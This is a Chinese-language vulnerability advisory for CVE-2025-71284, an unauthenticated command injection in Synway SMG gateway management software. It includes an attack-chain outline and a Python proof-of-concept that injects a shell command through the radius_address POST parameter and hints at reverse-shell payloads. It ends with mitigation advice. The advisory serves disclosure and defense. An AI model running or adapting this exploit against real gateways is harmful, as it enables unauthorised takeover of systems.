CVE-2025-71284 CVSS 9.8 严重

CVE-2025-71284 Synway SMG远程命令执行漏洞

披露日期: 2026-04-30

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-71284

漏洞类型

远程代码执行

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Synway SMG Gateway Management Software

漏洞概述

Synway SMG Gateway Management Software的RADIUS配置接口存在严重的操作系统命令注入漏洞。由于程序在处理配置更新请求时，未对`radius_address`等关键参数进行充分的过滤和清理，直接将其拼接到系统命令中执行。未经身份验证的远程攻击者可利用此漏洞，通过构造特制的恶意POST请求，在目标服务器上执行任意Shell命令，从而完全控制受影响系统。该漏洞利用门槛低且无需用户交互，对系统的机密性、完整性和可用性构成极高威胁。

技术细节

该漏洞源于`/en/9-2radius.php`文件中的不安全代码实现。当管理员或攻击者提交RADIUS配置时，后端代码接收POST参数（包括`radius_address`、`radius_address2`、`shared_secret2`、`source_ip`、`timeout`、`retry`），并将这些值直接传递给`sed`命令进行配置文件修改。由于缺乏对输入数据的消毒处理，攻击者可以在参数值中注入Shell元字符（如`;`、`&`、`|`、反引号等）。通过设置`save=1`和`enable_radius=1`参数触发保存逻辑，注入的命令将被操作系统解析并执行。这使得攻击者能够绕过身份验证机制，以Web服务器权限执行任意系统指令，如读取敏感文件、安装后门或建立反弹Shell。

攻击链分析

STEP 1

1. 信息收集

攻击者扫描互联网或内网，寻找开放了Web管理端口的Synway SMG网关设备。

STEP 2

2. 漏洞利用

攻击者向`/en/9-2radius.php`发送特制的POST请求，在`radius_address`参数中注入恶意Shell命令（如反弹Shell），并附带`save=1`和`enable_radius=1`参数。

STEP 3

3. 命令执行

服务器端脚本将恶意参数拼接到`sed`命令中执行，操作系统解析注入的元字符，从而执行攻击者指定的任意系统命令。

STEP 4

4. 权限维持与横向移动

攻击者成功获取服务器Shell权限后，可进一步安装后门、窃取凭证或内网渗透。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def exploit(target_url):
    """
    PoC for CVE-2025-71284 - OS Command Injection in Synway SMG
    """
    url = f"{target_url}/en/9-2radius.php"
    # Injecting a simple command to create a file or ping (example)
    payload = "127.0.0.1; touch /tmp/poc_success; #"
    
    data = {
        "radius_address": payload,
        "radius_address2": "127.0.0.1",
        "shared_secret2": "testing",
        "source_ip": "127.0.0.1",
        "timeout": "5",
        "retry": "3",
        "save": "1",
        "enable_radius": "1"
    }
    
    try:
        response = requests.post(url, data=data, timeout=10)
        if response.status_code == 200:
            print(f"[+] Request sent to {url}")
            print(f"[+] Payload: {payload}")
            print("[+] Check if the file /tmp/poc_success was created or use a reverse shell payload.")
        else:
            print(f"[-] Request failed with status code: {response.status_code}")
    except Exception as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    target = "http://target-ip" # Replace with actual target
    exploit(target)

影响范围

Synway SMG Gateway Management Software (具体版本未在描述中披露，建议全版本排查)

防御指南

临时缓解措施

建议立即检查设备日志是否存在针对`/en/9-2radius.php`的可疑访问记录。在官方补丁发布前，应通过网络访问控制列表（ACL）严格限制对SMG网关管理界面的访问，仅允许内部管理IP连接，并在边界防火墙上拦截相关恶意请求特征。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表